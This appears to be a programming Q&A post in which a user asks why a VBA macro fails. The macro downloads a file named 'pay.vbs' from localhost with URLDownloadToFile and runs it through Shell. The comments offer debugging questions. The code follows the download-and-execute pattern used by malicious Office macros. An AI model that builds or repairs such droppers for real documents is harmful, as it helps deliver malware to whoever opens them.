# Macro VBA Code Shell Invalad procedure call or argument

Tags: vba, vbscript

I am trying to make a macro that download and execute file. Here's the code:

```
Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
                    "URLDownloadToFileA" ( _
                        ByVal pCaller As Long, _
                        ByVal szURL As String, _
                        ByVal szFileName As String, _
                        ByVal dwReserved As Long, _
                        ByVal lpfnCB As Long) As Long

Sub AAA()
Dim SourceName As String
Dim Destination As String
Dim R As Long

SourceName = "http://localhost/files/pay.vbs"
Destination = "C:\users\david\ex.vbs"
R = URLDownloadToFile(0&, SourceName, Destination, 0&, 0&)
Shell "C:\users\david\ex.vbs", vbNormalFocus
End Sub
```

It gives me error: Invalid procedure call or argument

Comment: Assuming that **pay.vbs** is downloaded correctly and the error is in the shell execute, perhaps the local copy of **pay.vbs** is expecting parameters or references its original host in some way. See [vbscript to open an excel file in Windows 10 via Task Scheduler](http://stackoverflow.com/questions/32194129/vbscript-to-open-an-excel-file-in-windows-10-via-task-scheduler/32214672#32214672).

Comment: Is it the VBA or the VBScript that generates the error? What does the *exact* error message look like?

Comment: Are you using a 64-bit version of Windows?

Comment: @MacroMan Yes, Windows 10 64Bit